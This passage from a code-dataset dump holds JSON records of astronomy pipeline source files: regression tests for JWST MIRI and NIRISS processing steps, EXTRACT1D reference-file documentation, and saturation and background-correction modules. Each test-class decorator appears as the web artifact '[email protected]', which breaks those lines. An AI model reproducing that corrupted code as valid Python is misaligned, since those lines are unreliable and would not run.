\"\"\"Run master background step on a MIRI MRS association\"\"\"\n        asn_file = self.get_data(*self.test_dir,\n                                 'miri_mrs_mbkg_0304_spec3_asn.json')\n        for file in raw_from_asn(asn_file):\n            self.get_data(*self.test_dir, file)\n\n        collect_pipeline_cfgs('./config')\n        result = MasterBackgroundStep.call(\n            asn_file,\n            config_file='config/master_background.cfg',\n            save_background=True,\n            save_results=True,\n        )\n\n        # test 1\n        # loop over the background subtracted data and compare to truth files\n        # check that the cal_step master_background ran to complete\n        for model in result:\n            assert model.meta.cal_step.master_background == 'COMPLETE'\n            truth_file = self.get_data(*self.ref_loc,\n                                       model.meta.filename)\n            outputs = [(model.meta.filename, truth_file)]\n            self.compare_outputs(outputs)\n\n        # test 2\n        # compare the master background combined file to truth file\n        master_combined_bkg_file = 
'MIRI_MRS_seq1_MIRIFULONG_34LONGexp1_bkg_o002_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundMRSNodded(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'mrs', 'nodded', 'truth']\n test_dir = ['test_masterbackground', 'mrs', 'nodded']\n\n rtol = 0.000001\n\n def test_miri_masterbg_mrs_nodded(self):\n \"\"\"Run masterbackground step on MIRI MRS association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'miri_mrs_mbkg_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True,\n )\n\n # test 1\n # loop over the background subtracted data and compare to truth files\n # check that the cal_step master_background ran to complete\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n truth_file = self.get_data(*self.ref_loc,\n model.meta.filename)\n outputs = [(model.meta.filename, truth_file)]\n self.compare_outputs(outputs)\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'MIRI_MRS_nod_seq1_MIRIFUSHORT_12SHORTexp1_o001_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundLRSNodded(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'lrs', 'nodded', 'truth']\n test_dir = ['test_masterbackground', 'lrs', 'nodded']\n\n rtol = 0.000001\n\n def test_miri_masterbg_lrs_nodded(self):\n \"\"\"Run masterbackground step on MIRI LRS association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'miri_lrs_mbkg_nodded_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True,\n )\n\n # test 1\n # loop over the background subtracted data and compare to truth files\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n truth_file = self.get_data(*self.ref_loc,\n model.meta.filename)\n outputs = [(model.meta.filename, truth_file)]\n self.compare_outputs(outputs)\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'MIRI_LRS_nod_seq1_MIRIMAGE_P750Lexp1_o002_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundLRSDedicated(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_masterbackground', 'lrs', 'dedicated', 'truth']\n test_dir = ['test_masterbackground', 'lrs', 'dedicated']\n\n rtol = 0.000001\n\n def test_miri_masterbg_lrs_dedicated(self):\n \"\"\"Run masterbackground step on MIRI LRS association\"\"\"\n asn_file = self.get_data(*self.test_dir,\n 'miri_lrs_mbkg_dedicated_spec3_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(*self.test_dir, file)\n\n collect_pipeline_cfgs('./config')\n result = 
MasterBackgroundStep.call(\n asn_file,\n config_file='config/master_background.cfg',\n save_background=True,\n save_results=True,\n )\n\n # test 1\n # loop over the background subtracted data and compare to truth files\n for model in result:\n assert model.meta.cal_step.master_background == 'COMPLETE'\n truth_file = self.get_data(*self.ref_loc,\n model.meta.filename)\n outputs = [(model.meta.filename, truth_file)]\n self.compare_outputs(outputs)\n\n # test 2\n # compare the master background combined file to truth file\n master_combined_bkg_file = 'MIRI_LRS_seq1_MIRIMAGE_P750Lexp1_o001_masterbg.fits'\n truth_background = self.get_data(*self.ref_loc,\n master_combined_bkg_file)\n outputs = [(master_combined_bkg_file, truth_background)]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5786089897155762, "alphanum_fraction": 0.581531286239624, "avg_line_length": 27.516666412353516, "blob_id": "acf768a07856ab6032c4416766ff284c571e1b83", "content_id": "fedab25d71ea177168c8a53958f7233cb68497a6", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1711, "license_type": "permissive", "max_line_length": 69, "num_lines": 60, "path": "/jwst/tests_nightly/general/nircam/test_wfs_combine.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test wfs_combine\"\"\"\n\nfrom glob import glob\nimport os.path as op\n\nimport pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\nfrom jwst.associations import load_asn\nfrom jwst.associations.lib.rules_level3_base import format_product\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe.step import Step\n\n\[email protected]\nclass TestWFSImage3Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_wfs_combine', 'truth']\n test_dir = 'test_wfs_combine'\n\n def test_asn_naming(self):\n \"\"\"Test a full run\"\"\"\n\n # Get the data\n collect_pipeline_cfgs('cfgs')\n asn_path = self.get_data(\n self.test_dir, 'wfs_3sets_asn.json'\n )\n with open(asn_path) as fh:\n asn = load_asn(fh)\n for product in asn['products']:\n for member in product['members']:\n self.get_data(\n self.test_dir, member['expname']\n )\n input_files = glob('*')\n\n # Run the step.\n args = [\n op.join('cfgs', 'calwebb_wfs-image3.cfg'),\n asn_path\n ]\n Step.from_cmdline(args)\n\n # Test.\n output_files = glob('*')\n for input_file in input_files:\n output_files.remove(input_file)\n print('output_files = {}'.format(output_files))\n\n for product in asn['products']:\n prod_name = product['name']\n prod_name = format_product(prod_name, suffix='wfscmb')\n prod_name += '.fits'\n assert prod_name in output_files\n output_files.remove(prod_name)\n\n # There should be no more files\n assert len(output_files) == 0\n" }, { "alpha_fraction": 0.6920225620269775, "alphanum_fraction": 0.7114424109458923, "avg_line_length": 47.47265625, "blob_id": "8bf6db226b3d48d3d5a07d7e21918f527ecd94ac", "content_id": "991047663c7eed3528d82dadf8f57a3429accd0f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 12410, "license_type": "permissive", "max_line_length": 153, "num_lines": 256, "path": "/docs/jwst/references_general/extract1d_reffile.inc", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": ".. _extract1d_reffile:\n\nEXTRACT1D Reference File\n------------------------\nThe EXTRACT1D reference file contains information needed to guide\nthe 1-D extraction process. 
It is a text file, with the information\nin JSON format.\n\n.. include:: ../references_general/extract1d_selection.inc\n\n.. include:: ../includes/standard_keywords.inc\n\nType Specific Keywords for EXTRACT1D\n++++++++++++++++++++++++++++++++++++\nIn addition to the standard reference file keywords listed above,\nthe following keywords are *required* in EXTRACT1D reference files,\nbecause they are used as CRDS selectors\n(see :ref:`extract1d_selectors`):\n\n========= ==============================\nKeyword Data Model Name\n========= ==============================\nEXP_TYPE model.meta.exposure.type\n========= ==============================\n\nReference File Format\n+++++++++++++++++++++\nEXTRACT1D reference files are text files, with the information stored in\nJSON format.\nAll the information is specified in a list with key ``apertures``. Each\nelement of this list is a dictionary, one for each aperture (e.g. a slit)\nthat is supported by the given reference file. The particular dictionary\nto use is found by matching the slit name in the science data with the\nvalue of key ``id``. Key ``spectral_order`` is optional, but if it is\npresent, it must match the expected spectral order number.\n\nThe following keys are supported for non-IFU data (see below for IFU keys).\nKey ``id`` is the primary criterion for selecting which element of\nthe ``apertures`` list to use. The slit name (except for a full-frame\ninput image) is compared with the values of ``id`` in the ``apertures``\nlist to select the appropriate aperture.\nIn order to allow the possibility of multiple\nspectral orders for the same slit name, there may be more than one element\nof ``apertures`` with the same value for key ``id``. These should then be\ndistinguished by using the secondary selection criterion ``spectral_order``.\nIn this case, the various spectral orders would likely have different\nextraction locations within the image, so different elements of ``apertures``\nare needed in order to specify those locations.\nIf key ``dispaxis`` is specified, its value will be used to set the\ndispersion direction within the image. If ``dispaxis`` is\nnot specified, the dispersion direction will be taken to be the axis\nalong which the wavelengths change more rapidly.\nKey ``region_type`` can be omitted, but if it is specified, its value must\nbe \"target\". The source extraction region can be specified with ``ystart``,\n``ystop``, etc., but a more flexible alternative is to use ``src_coeff``.\nIf background is to be subtracted, this should be specified by giving\n``bkg_coeff``. These are described in more detail below.\n\n* id: the slit name, e.g. 
\"S200A1\" (string)\n* spectral_order: the spectral order number (optional); this can be either\n positive or negative, but it should not be zero (int)\n* dispaxis: dispersion direction, 1 for X, 2 for Y (int)\n* xstart: first pixel in the horizontal direction, X (int)\n* xstop: last pixel in the horizontal direction, X (int)\n* ystart: first pixel in the vertical direction, Y (int)\n* ystop: last pixel in the vertical direction, Y (int)\n* src_coeff: this takes priority for specifying the source extraction region\n (list of lists of float)\n* bkg_coeff: for specifying background subraction regions\n (list of lists of float)\n* independent_var: \"wavelength\" or \"pixel\" (string)\n* smoothing_length: width of boxcar for smoothing background regions along\n the dispersion direction (odd int)\n* bkg_order: order of polynomial fit to background regions (int)\n* extract_width: number of pixels in cross-dispersion direction (int)\n\nIf ``src_coeff`` is given, those coefficients take priority for specifying\nthe source extraction region in the cross-dispersion direction. ``xstart``\nand ``xstop`` (or ``ystart`` and ``ystop`` if ``dispaxis`` is 2) will\nstill be used for the limits in the dispersion direction. Background\nsubtraction will be done if and only if ``bkg_coeff`` is given. See below\nfor further details.\n\nFor IFU cube data, the following keys are used instead of those above.\nNote that for an extended source, anything specified in a reference file\nor command-line argument will be ignored; the entire image will be\nextracted, and no background subtraction will be done.\n\n* id: the slit name, but this can be \"ANY\" (string)\n* x_center: X pixel coordinate of the target (pixels, float, the default\n is the center of the image along the X axis)\n* y_center: Y pixel coordinate of the target (pixels, float, the default\n is the center of the image along the Y axis)\n* radius: the radius of the circular extraction aperture (pixels, float,\n default is one quarter of the smaller of the image axis lengths)\n* subtract_background: if true, subtract a background determined from an\n annulus with inner and outer radii given by ``inner_bkg`` and\n ``outer_bkg`` (boolean)\n* inner_bkg: of the inner edge of the background annulus (pixels, float,\n default = ``radius``)\n* outer_bkg: of the outer edge of the background annulus (pixels, float,\n default = ``inner_bkg * sqrt(2)``)\n* method: one of \"exact\", \"subpixel\", or \"center\", the method\n used by photutils for computing the overlap between apertures and pixels\n (string, default is \"exact\")\n* subpixels: if ``method`` is \"subpixel\", pixels will be resampled by this\n factor in each dimension (int, the default is 5)\n\nThe rest of this description pertains to the parameters for non-IFU data.\n\nIf ``src_coeff`` is not given, the extraction limits can be specified by\n``xstart``, ``xstop``, ``ystart``, ``ystop``, and ``extract_width``. Note\nthat all of these values are integers, and that the start and stop limits\nare inclusive.\nIf ``dispaxis``\nis 1, the zero-indexed limits in the dispersion direction are ``xstart``\nand ``xstop``; if ``dispaxis`` is 2, the dispersion limits are ``ystart``\nand ``ystop``. (The dispersion limits can be given even if ``src_coeff``\nhas been used for defining the cross-dispersion limits.) The limits in\nthe cross-dispersion direction can be given by ``ystart`` and ``ystop``\n(or ``xstart`` and ``xstop`` if ``dispaxis`` is 2). 
If ``extract_width``\nis also given, that takes priority over ``ystart`` to ``ystop`` (for\n``dispaxis`` = 1) for the extraction width, but ``ystart`` and ``ystop``\n(for ``dispaxis`` = 1) will still be used to define the middle in the\ncross-dispersion direction. Any of these parameters can be modified\nby the step code if the extraction region would extend outside the input\nimage, or outside the domain specified by the WCS.\n\nThe source extraction region can be specified more precisely by giving\n``src_coeff``, coefficients for polynomial functions for the lower and\nupper limits of the source extraction region. As described in the previous\nparagraph, using this key will override the values\nof ``ystart`` and ``ystop`` (if ``dispaxis`` is 1) or ``xstart`` and\n``xstop`` (if ``dispaxis`` is 2), and ``extract_width``. These polynomials\nare functions of either wavelength (in microns) or pixel number (pixels in\nthe dispersion direction, with respect to the input 2-D slit image),\nspecified by the key ``independent_var``. The default is \"pixel\".\nThe values of these polynomial functions are pixel numbers in the\ndirection perpendicular to dispersion. More than one source extraction\nregion may be specified, though this is not expected to be a typical case.\n\nBackground regions are specified by giving ``bkg_coeff``, coefficients for\npolynomial functions for the lower and upper limits of one or more regions.\nBackground subtraction will be done only if ``bkg_coeff`` is given in the\nreference file. See below for an example. See also ``bkg_order`` below.\n\nThe coefficients are specified as a list of an even number of lists (an\neven number because both the lower and upper limits of each extraction region\nmust be specified). The source extraction coefficients will normally be\na list of just two lists, the coefficients for the lower limit function\nand the coefficients for the upper limit function of one extraction\nregion. The limits could just be constant values,\ne.g. \\[\\[324.5\\], \\[335.5\\]\\]. Straight but tilted lines are linear functions:\n\n\\[\\[324.5, 0.0137\\], \\[335.5, 0.0137\\]\\]\n\nMultiple regions may be specified for either the source or background, or\nboth. It will be common to specify more than one background region. Here\nis an example for specifying two background regions:\n\n\\[\\[315.2, 0.0135\\], \\[320.7, 0.0135\\], \\[341.1, 0.0139\\], \\[346.8, 0.0139\\]\\]\n\nThis is interpreted as follows:\n\n* \\[315.2, 0.0135\\]: lower limit for first background region\n* \\[320.7, 0.0135\\]: upper limit for first background region\n* \\[341.1, 0.0139\\]: lower limit for second background region\n* \\[346.8, 0.0139\\]: upper limit for second background region\n\nIf the dispersion direction is vertical, replace \"lower\" with \"left\" and\n\"upper\" with \"right\" in the above description.\n\nNote especially that ``src_coeff`` and ``bkg_coeff`` contain floating-point\nvalues. For interpreting fractions of a pixel, the convention used here\nis that the pixel number at the center of a pixel is a whole number. Thus,\nif a lower or upper limit is a whole number, that limit splits the pixel\nin two, so the weight for that pixel will be 0.5. To include all the\npixels between 325 and 335 inclusive, for example, the lower and upper\nlimits would be given as 324.5 and 335.5 respectively.\n\nThe order of a polynomial is specified implicitly to be one less than the\nnumber of coefficients (this should not be confused with ``bkg_order``,\ndescribed below). 
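For example, the two-element list ``[324.5, 0.0137]`` shown above specifies\na first-order (linear) polynomial. With ``independent_var`` set to \"pixel\",\nits value at dispersion pixel 1000 would be 324.5 + 0.0137 * 1000 = 338.2,\nso that limit drifts by about 14 pixels over 1000 columns.\n\n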
The number of coefficients must be at least one, and\nthere is no predefined upper limit. The various polynomials (lower limits,\nupper limits, possibly multiple regions) do not need to have the same\nnumber of coefficients; each of the inner lists specifies a separate\npolynomial. However, the independent variable (wavelength or pixel)\ndoes need to be the same for all polynomials for a given slit image\n(identified by key ``id``).\n\nThe background is determined independently for each column (or row, if\n``dispaxis`` is 2) of the spectrum. The ``smoothing_length`` parameter\nis the width of a boxcar for smoothing the background in the dispersion\ndirection. If this is not specified, either in the reference file, the\nconfig file, or on the command line, no smoothing will be done along the\ndispersion direction. Following background smoothing (if any), for each\ncolumn (row), a polynomial of order ``bkg_order`` will be fit to the pixel\nvalues in that column (row) in all the background regions. If not\nspecified, a value of 0 will be used, i.e. a constant function, the mean\nvalue. The polynomial will then be evaluated at each pixel within the\nsource extraction region for that column (row), and the fitted values will\nbe subtracted (pixel by pixel) from the source count rate.\n\nExample EXTRACT1D Reference File\n--------------------------------\nThe following JSON was taken as an example from reference file\njwst_niriss_extract1d_0003.json::\n\n {\n \"REFTYPE\": \"EXTRACT1D\",\n \"INSTRUME\": \"NIRISS\",\n \"TELESCOP\": \"JWST\",\n \"DETECTOR\": \"NIS\",\n \"EXP_TYPE\": \"NIS_SOSS\",\n \"PEDIGREE\": \"GROUND\",\n \"DESCRIP\": \"NIRISS SOSS extraction params for ground testing\",\n \"AUTHOR\": \"M.Wolfe, H.Bushouse\",\n \"HISTORY\": \"This reference file is for used in Build 7.1 of the JWST Calibraton pipeline. 
The regions are rectagular and do not follow the trace.\",\n \"USEAFTER\": \"2015-11-01T00:00:00\",\n \"apertures\": [\n {\n \"id\": \"FULL\",\n \"region_type\": \"target\",\n \"bkg_coeff\": [[2014.5],[2043.5]],\n \"xstart\": 4,\n \"xstop\": 2044,\n \"ystart\": 1792,\n \"ystop\": 1972,\n \"dispaxis\": 1,\n \"extract_width\": 181\n },\n\n {\n \"id\": \"SUBSTRIP256\",\n \"region_type\": \"target\",\n \"bkg_coeff\": [[221.5],[251.5]],\n \"xstart\": 4,\n \"xstop\": 2044,\n \"ystart\": 20,\n \"ystop\": 220,\n \"dispaxis\": 1,\n \"extract_width\": 201\n },\n\n {\n \"id\": \"SUBSTRIP96\",\n \"region_type\": \"target\",\n \"bkg_coeff\": [[1.5],[8.5],[92.5],[94.5]],\n \"xstart\": 4,\n \"xstop\": 2044,\n \"ystart\": 10,\n \"ystop\": 92,\n \"dispaxis\": 1,\n \"extract_width\": 83\n }]\n }\n\n" }, { "alpha_fraction": 0.42064306139945984, "alphanum_fraction": 0.4865861237049103, "avg_line_length": 45.5047607421875, "blob_id": "f750a3deea671d83f3adc52a6948f7439da893c2", "content_id": "848e483c0d79b929487f5f3835eb1ea5c4d8b530", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4883, "license_type": "permissive", "max_line_length": 88, "num_lines": 105, "path": "/jwst/tests_nightly/general/niriss/test_niriss_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.ami import AmiAnalyzeStep\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.jump import JumpStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.saturation import SaturationStep\nfrom jwst.pathloss import PathLossStep\n\n\n# Parameterized regression tests for NIRISS processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestNIRISSSteps(BaseJWSTTestSteps):\n input_loc = 'niriss'\n\n params = {'test_steps':\n [dict(input='ami_analyze_input_16.fits',\n test_dir='test_ami_analyze',\n step_class=AmiAnalyzeStep,\n step_pars=dict(oversample=3, rotation=1.49),\n output_truth=('ami_analyze_ref_output_16.fits',\n dict(rtol = 0.00001)),\n output_hdus=['primary','fit','resid','closure_amp',\n 'closure_pha','fringe_amp','fringe_pha',\n 'pupil_pha','solns'],\n id='ami_analyze_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_dq_init.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(odd_even_columns=True,\n use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00034001001_01101_00001_NIRISS_bias_drift.fits',\n output_hdus=[],\n id='refpix_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_saturation.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_dark_current.fits',\n output_hdus=[],\n id='dark_current_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_dq_init.fits',\n output_hdus=[],\n id='dq_init_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_ramp_fit.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n 
output_truth='jw00034001001_01101_00001_NIRISS_flat_field.fits',\n output_hdus=[],\n id='flat_field_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=20.0),\n output_truth='jw00034001001_01101_00001_NIRISS_jump.fits',\n output_hdus=[],\n id='jump_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_linearity.fits',\n output_hdus=[],\n id='linearity_niriss'\n ),\n dict(input='jw00034001001_01101_00001_NIRISS_bias_drift.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00034001001_01101_00001_NIRISS_saturation.fits',\n output_hdus=[],\n id='saturation_niriss'\n ),\n dict(input='soss_2AB_results_int_assign_wcs.fits',\n test_dir='test_pathloss',\n step_class=PathLossStep,\n step_pars=dict(),\n output_truth='soss_2AB_results_int_pathloss.fits',\n output_hdus=[],\n id='pathloss_niriss'\n ),\n ]\n }\n" }, { "alpha_fraction": 0.6200422048568726, "alphanum_fraction": 0.6274261474609375, "avg_line_length": 34.63909912109375, "blob_id": "daa78899fe0b7c57d0992140e26cf84634aa21e4", "content_id": "5a11d01dbab2cba6f56489b32cb24998142adfd3", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4740, "license_type": "permissive", "max_line_length": 83, "num_lines": 133, "path": "/jwst/saturation/saturation.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# Module for 2d saturation\n#\nimport logging\n\nfrom ..datamodels import dqflags\nfrom ..lib import reffile_utils\nfrom ..lib import pipe_utils\nfrom . 
import x_irs2\n\nimport numpy as np\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\nHUGE_NUM = 100000.\n\ndef do_correction(input_model, ref_model):\n    \"\"\"\n    Short Summary\n    -------------\n    Execute all tasks for saturation, including using a saturation reference\n    file.\n\n    Parameters\n    ----------\n    input_model: data model object\n        The input science data to be corrected\n\n    ref_model: data model object\n        Saturation reference file model object\n\n    Returns\n    -------\n    output_model: data model object\n        object having GROUPDQ array saturation flags set\n    \"\"\"\n\n    ramparr = input_model.data\n    # Was IRS2 readout used?\n    is_irs2_format = pipe_utils.is_irs2(input_model)\n    if is_irs2_format:\n        irs2_mask = x_irs2.make_mask(input_model)\n\n    # Create the output model as a copy of the input\n    output_model = input_model.copy()\n    groupdq = output_model.groupdq\n\n    # Extract subarray from reference file, if necessary\n    if reffile_utils.ref_matches_sci(input_model, ref_model):\n        satmask = ref_model.data\n        dqmask = ref_model.dq\n    else:\n        log.info('Extracting reference file subarray to match science data')\n        ref_sub_model = reffile_utils.get_subarray_model(input_model, ref_model)\n        satmask = ref_sub_model.data.copy()\n        dqmask = ref_sub_model.dq.copy()\n        ref_sub_model.close()\n\n    # For pixels flagged in reference file as NO_SAT_CHECK, set the dq mask\n    # and saturation mask\n    wh_sat = np.bitwise_and(dqmask, dqflags.pixel['NO_SAT_CHECK'])\n    dqmask[wh_sat == dqflags.pixel['NO_SAT_CHECK']] = dqflags.pixel['NO_SAT_CHECK']\n    satmask[wh_sat == dqflags.pixel['NO_SAT_CHECK']] = HUGE_NUM\n    # Correct saturation values for NaNs in the ref file\n    correct_for_NaN(satmask, dqmask)\n\n    dq_flag = dqflags.group['SATURATED']\n\n    nints = ramparr.shape[0]\n    ngroups = ramparr.shape[1]\n\n    detector = input_model.meta.instrument.detector\n    flagarray = np.zeros(ramparr.shape[-2:], dtype=groupdq.dtype)\n    for ints in range(nints):\n        for plane in range(ngroups):\n            # Update the 4D groupdq array with the saturation flag. The\n            # flag is set in the current plane and all following planes.\n            if is_irs2_format:\n                sci_temp = x_irs2.from_irs2(ramparr[ints, plane, :, :],\n                                            irs2_mask, detector)\n                flag_temp = np.where(sci_temp >= satmask, dq_flag, 0)\n                # Copy flag_temp into flagarray.\n                x_irs2.to_irs2(flagarray, flag_temp, irs2_mask, detector)\n            else:\n                flagarray[:, :] = np.where(ramparr[ints, plane, :, :] >= satmask,\n                                           dq_flag, 0)\n            np.bitwise_or(groupdq[ints, plane:, :, :], flagarray,\n                          groupdq[ints, plane:, :, :])\n\n    output_model.groupdq = groupdq\n    if is_irs2_format:\n        pixeldq_temp = x_irs2.from_irs2(output_model.pixeldq, irs2_mask,\n                                        detector)\n        pixeldq_temp = np.bitwise_or(pixeldq_temp, dqmask)\n        x_irs2.to_irs2(output_model.pixeldq, pixeldq_temp, irs2_mask, detector)\n    else:\n        output_model.pixeldq = np.bitwise_or(output_model.pixeldq, dqmask)\n\n    return output_model\n\n\ndef correct_for_NaN(satmask, dqmask):\n    \"\"\"\n    Short Summary\n    -------------\n    If there are NaNs in the saturation values in the reference file, reset\n    them to a very high value such that the comparison never results in a\n    positive (saturated) result for the associated pixels in the science data.\n    Also reset the associated dqmask values to indicate that, effectively,\n    no saturation check will be done for those pixels.\n\n    Parameters\n    ----------\n    satmask: 2-d array\n        Subarray of saturation thresholds, from the saturation reference\n        file. 
This may be modified in-place.\n\n dqmask: ndarray, same shape as `satmask`\n The DQ array from the saturation reference file, used to update\n the PIXELDQ array in the output. This may be modified in-place.\n \"\"\"\n # If there are NaNs as the saturation values, update those values\n # to ensure there will not be saturation.\n wh_nan = np.isnan(satmask)\n\n if np.any(wh_nan):\n satmask[wh_nan] = HUGE_NUM\n dqmask[wh_nan] |= dqflags.pixel['NO_SAT_CHECK']\n\n log.info(\"Unflagged pixels having saturation values set to NaN were\"\n \" detected in the ref file; for those affected pixels no\"\n \" saturation check will be made.\")\n" }, { "alpha_fraction": 0.6759656667709351, "alphanum_fraction": 0.677396297454834, "avg_line_length": 30.066667556762695, "blob_id": "af2d16740262b4f665349d89df5ec2096af3581a", "content_id": "4c36bc21b142e5f8779163b4d21e1740ce1eaa27", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1398, "license_type": "permissive", "max_line_length": 86, "num_lines": 45, "path": "/jwst/tests_nightly/general/associations/conftest.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Pytest configurations\"\"\"\nimport pytest\n\nfrom jwst.tests_nightly.general.associations.sdp_pools_source import SDPPoolsSource\n\n\n# Add option to specify a single pool name\ndef pytest_addoption(parser):\n parser.addoption(\n '--sdp-pool', metavar='sdp_pool', default=None,\n help='SDP test pool to run. Specify the name only, not extension or path'\n )\n parser.addoption(\n '--standard-pool', metavar='standard_pool', default=None,\n help='Standard test pool to run. Specify the name only, not extension or path'\n )\n\n\[email protected]\ndef sdp_pool(request):\n \"\"\"Retrieve a specific SDP pool to test\"\"\"\n return request.config.getoption('--sdp-pool')\n\n\[email protected]\ndef standard_pool(request):\n \"\"\"Retrieve a specific standard pool to test\"\"\"\n return request.config.getoption('--standard-pool')\n\n\ndef pytest_generate_tests(metafunc):\n \"\"\"Prefetch and parametrize a set of test pools\"\"\"\n if 'pool_path' in metafunc.fixturenames:\n SDPPoolsSource.inputs_root = metafunc.config.getini('inputs_root')[0]\n SDPPoolsSource.results_root = metafunc.config.getini('results_root')[0]\n SDPPoolsSource.env = metafunc.config.getoption('env')\n\n pools = SDPPoolsSource()\n\n try:\n pool_paths = pools.pool_paths\n except Exception:\n pool_paths = []\n\n metafunc.parametrize('pool_path', pool_paths)\n" }, { "alpha_fraction": 0.6693548560142517, "alphanum_fraction": 0.6709677577018738, "avg_line_length": 27.837209701538086, "blob_id": "88d3b3b193f77613dd0cf241402e3c649bc22570", "content_id": "b6a4fbcebbca12e4b59448ee836a52934d252326", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1240, "license_type": "permissive", "max_line_length": 72, "num_lines": 43, "path": "/jwst/master_background/nirspec_corrections.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import logging\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\ndef correct_nrs_ifu_bkg(input):\n \"\"\"Apply point source vs. 
uniform source pathloss adjustments\n    to a NIRSpec IFU 2D master background array.\n\n    Parameters\n    ----------\n    input : `~jwst.datamodels.IFUImageModel`\n        The input background data.\n\n    Returns\n    -------\n    input : `~jwst.datamodels.IFUImageModel`\n        An updated (in place) version of the input with the data\n        replaced by the corrected 2D background.\n    \"\"\"\n\n    log.info('Applying point source pathloss updates to IFU background')\n\n    # Try to load the appropriate pathloss correction arrays\n    try:\n        pl_point = input.getarray_noinit('pathloss_point')\n    except AttributeError:\n        log.warning('Pathloss_point array not found in input')\n        log.warning('Skipping pathloss background updates')\n        return input\n\n    try:\n        pl_uniform = input.getarray_noinit('pathloss_uniform')\n    except AttributeError:\n        log.warning('Pathloss_uniform array not found in input')\n        log.warning('Skipping pathloss background updates')\n        return input\n\n    # Apply the corrections\n    input.data *= (pl_point / pl_uniform)\n\n    return input\n" }, { "alpha_fraction": 0.5424731373786926, "alphanum_fraction": 0.6161290407180786, "avg_line_length": 37.35051727294922, "blob_id": "54cc8d6b276725df84e6580629170333ca8c9e3b", "content_id": "6937c9bbf14366e35b9039ea6a03320e46e152f0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3720, "license_type": "permissive", "max_line_length": 83, "num_lines": 97, "path": 